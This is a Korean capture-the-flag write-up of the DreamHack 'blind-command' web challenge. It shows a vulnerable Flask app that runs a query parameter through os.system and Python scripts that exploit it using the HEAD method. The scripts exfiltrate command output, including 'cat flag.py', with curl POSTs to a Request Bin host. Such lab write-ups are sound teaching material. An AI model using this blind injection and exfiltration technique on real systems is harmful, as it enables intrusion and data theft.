[DreamHack] 드림핵 웹해킹 : blind-command

https://dreamhack.io/wargame/challenges/73/

blind-command

 

문제

Read FLAG file XD

 

탐색

들어가면 꽤나 불친절한 화면이 나온다

 

url 쿼리에 ?cmd=값 을 추가하니 해당하는 값이 나오는 간단한 사이트다

 

 

문제 파일을 보자

#!/usr/bin/env python3
from flask import Flask, request
import os

app = Flask(__name__)

@app.route('/' , methods=['GET'])
def index():
    cmd = request.args.get('cmd', '')
    if not cmd:
        return "?cmd=[cmd]"

    if request.method == 'GET':
        ''
    else:
        os.system(cmd)
    return cmd

app.run(host='0.0.0.0', port=8000)

 

꽤나 짧고 간단한 파일이다.

url에서 cmd에 값이 없다면 맨 처음 화면을 보여주고

값이 있다면 해당 cmd 값을 리턴한다.

 

이때 아주 달달해보이는 os.system이 있다.

cmd에 내가 넣은 값을 명령어로 실행이 가능하다!

단, get이 아닌 메소드로 접근해야만.

 

풀이

Get 말고 쓸 수 있는 메소드를 알아보자

options 메소드를 사용한다.

 

import requests

url="http://host3.dreamhack.games:10243"

response = requests.options(url)

print(response)
print(response.headers.get)
print(response.text)

파이썬은 코랩이 최고

 

주어진 엔드포인트에서는 Head, Options, Get 메소드를 사용 가능하다고 한다

 

get put delete post 같은 흔한 메소드가 아닌 head, option 메소드에 대한 정보는 아래 글을 참고하자

https://tifferent.tistory.com/15

HEAD 메소드와 OPTIONS 메소드에 대하여

 

사용 가능한 메소드 중 head를 사용해보자

 

post 메소드는 사용이 안되는걸 볼 수 있다.

head는 잘 작동하고 있다

다만 응답에 본문 없이 헤더만 포함되어 있어서 명령어가 실행되더라도 내용을 알 수 없다 (ㅠㅠ)

 

일단 명령어는 실행되는 것 같으니 시스템 명령어가 실행되는 과정에서 내가 만든 서버와 연결하고 응답을 이쪽으로 보내버리면 된다

Request Bin을 이용하여 서버를 실행해주고, 명령어 curl을 이용해주었다.

Request Bin은 드림핵에서 제공해주는 무료툴을 이용한다.

 

https://tools.dreamhack.games/requestbin

dreamhack-tools

 

임시로 생성한 api가 잘 작동하는 것 확인.

 

 

import requests
import urllib.parse

cmd='curl https://orkneuu.request.dreamhack.games'

encoded_cmd = urllib.parse.quote(cmd)
url=f"http://host3.dreamhack.games:12750?cmd={encoded_cmd}"

print(f"url: '{url}'")

response = requests.head(url)

print(response)
print(response.headers.get)

request bin 만료로 위와는 임시 url이 다르다 ㅋㅋ

임시 url에 get 요청을 보내는 "curl https://orkneuu.request.dreamhack.games" 명령어를 만들고

이를 url 인코딩 해서 encoded_cmd에 저장하고

이 인코딩된 문자열을 문제에 해당하는 url의 끝에 cmd 쿼리의 값으로 넣어줘서 실행해보면

로그가 잘 찍힌다.

 

Get이 아닌 head 메소드를 이용하였기 때문에 문제 속 서버 내에서 

os.system("curl https://orkneuu.request.dreamhack.games")

이 실행된 것 과 같다

 

import requests
import urllib.parse

bin_api="https://wsufirp.request.dreamhack.games"
system_cmd="ls"
cmd=f'curl -X POST {bin_api} -d "$({system_cmd})"'

print(cmd)

encoded_cmd = urllib.parse.quote(cmd)
url=f"http://host3.dreamhack.games:12750?cmd={encoded_cmd}"

response = requests.head(url)

print(response)
print(response.headers.get)

post 메소드를 실행하는 과정에서 curl 명령어의 -d 옵션을 이용하여 ls 명령어를 담아 보내준다.

명령어를 실행한 결과가 body에 담겨져서 보내진다!

 

curl -X POST https://mauvpvy.request.dreamhack.games -d "$(cat flag.py)"

성공